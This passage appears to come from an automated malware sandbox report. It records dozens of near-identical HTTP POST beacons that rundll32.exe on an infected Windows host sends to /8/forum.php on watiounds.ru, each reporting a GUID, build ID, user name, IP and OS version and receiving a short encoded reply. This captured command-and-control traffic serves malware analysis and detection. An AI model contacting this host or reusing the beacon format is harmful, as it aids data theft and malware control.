                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:12.773057938 CEST155INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:12 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 42 59 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHBYSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          108192.168.2.224927395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:13.087593079 CEST156OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:13.209937096 CEST156INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:13 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZBYAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          109192.168.2.224927495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:13.518112898 CEST157OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:13.640049934 CEST157INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:13 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 41 5a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAAZZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          11192.168.2.224917695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:19:02.541588068 CEST31OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:19:02.672355890 CEST32INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:19:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 59 42 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCYBXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          110192.168.2.224927595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:13.961709976 CEST158OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:14.088989019 CEST158INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4a 51 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVJQEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          111192.168.2.224927695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:14.420356035 CEST159OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:14.547636986 CEST160INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 48 53 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMHSNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          112192.168.2.224927795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:14.873043060 CEST160OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:15.002720118 CEST161INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 54 47 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQTGJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          113192.168.2.224927895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:15.325035095 CEST161OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:15.447942019 CEST162INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMGTNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          114192.168.2.224927995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:15.767858028 CEST163OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:15.891278028 CEST163INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 4d 4e 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKMNPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          115192.168.2.224928095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:16.203042030 CEST164OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:16.326600075 CEST164INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:16 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4b 50 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYKPBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          116192.168.2.224928195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:16.643929958 CEST165OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:16.781843901 CEST165INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:16 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZBYAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          117192.168.2.224928295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:17.100992918 CEST166OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:17.227116108 CEST166INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 54 47 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHTGSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          118192.168.2.224928395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:17.550564051 CEST167OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:17.675575972 CEST167INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 56 45 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGVETARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          119192.168.2.224928495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:17.991719007 CEST168OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:18.118484974 CEST169INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMGTNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          12192.168.2.224917795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:19:17.758652925 CEST34OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:19:17.883658886 CEST34INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:19:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 56 45 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBVEYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          120192.168.2.224928595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:18.440169096 CEST169OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:18.564140081 CEST170INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 48 53 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZHSAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          121192.168.2.224928695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:18.870163918 CEST170OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:18.998110056 CEST171INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 56 45 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNVEMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          122192.168.2.224928795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:19.318085909 CEST172OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:19.447474003 CEST172INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 54 47 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
